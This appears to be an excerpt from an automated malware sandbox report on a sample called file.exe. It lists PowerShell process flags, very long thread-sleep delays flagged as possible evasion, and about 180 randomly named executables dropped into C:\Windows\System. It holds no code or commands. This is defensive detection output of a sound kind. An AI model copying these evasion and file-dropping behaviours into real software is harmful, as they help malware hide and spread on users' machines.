Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3630

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WlVmTit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UyqOZIb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xAzCYwU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eXUokzg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rTrjeti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\IpqVIyY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AONeoTK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RgcKJVt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\oUGjnOU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bymvMyH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gPTriDK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BwjWQVv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\snZBbmy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XBXKJRi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\KEULPTl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\osHoaGO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eQlnkhq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mgbtojr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\Uvtpjkd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UmvuxvA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NLJeLdM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LNyWtrn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ORmCcsC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xneUGSK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZlvPlxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\KVgdAzq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xVIixqx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jYFqRXp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sHbEZkY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JCZRmvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rVmcjTa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XAgYYqB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\aIuDozC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DtVOaSb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RCVCpIi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WTLAzgJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\IEswIyo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\whRtinB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\IjDqKMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mXElbHo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VgNRTsd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DbVBXPi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iEDLgeS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uaJCfvY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\qmcblFN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jAqlPqL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZCyEzte.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ztQluWW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JKpmIVS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wibjUVa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\vixYnHG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\GmNUXAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\IofoOIp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PPOtBBY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZohDODH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tyXEsEa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CWLRJYu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HnTfvAZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\delwiax.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AbenojY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FUwHkXo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EkcZQPq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fylerHE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mlhNNPN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\vUKZkjM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\yXkrKHV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VwIvzCk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pMaKiZu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BMxbfij.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OVdNTki.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VdwdSnC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fyffsXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NVxCwjX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\TscCBWf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FHjAcHx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\glgdLrR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wJZTVhW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gCZFmUf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pbwrbNh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HbWODob.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WVsCsMZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FgBtrMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\TBNKhIN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\TQUlNhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JUxucoT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\izzcVgF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YFzrUDj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bpCJdvZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lyMiIxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VGaSwYr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\veVfAiw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UlGsoAn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HVhldsH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZPBkGsL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZXNyiNu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sGYPztO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uSdaSKW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eIXgzbs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YHgRCCe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YnfMwga.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\yzVBTwc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\chBMsUn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UExJWUr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EMuPVcI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PLFTiIe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wpjxcMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LOvnxUx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EDndQMl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wCJLXKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ABievJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sXBohAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OyxgWny.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fhxlOMT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mPNsbfH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bxBimDh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WZkiNdG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MKAkyBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PrFZfUv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BNgUfBr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nkFLDPI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ukkpYme.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SUucMiy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\aFpkhGM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\yolnOnG.exe	Jump to dropped file
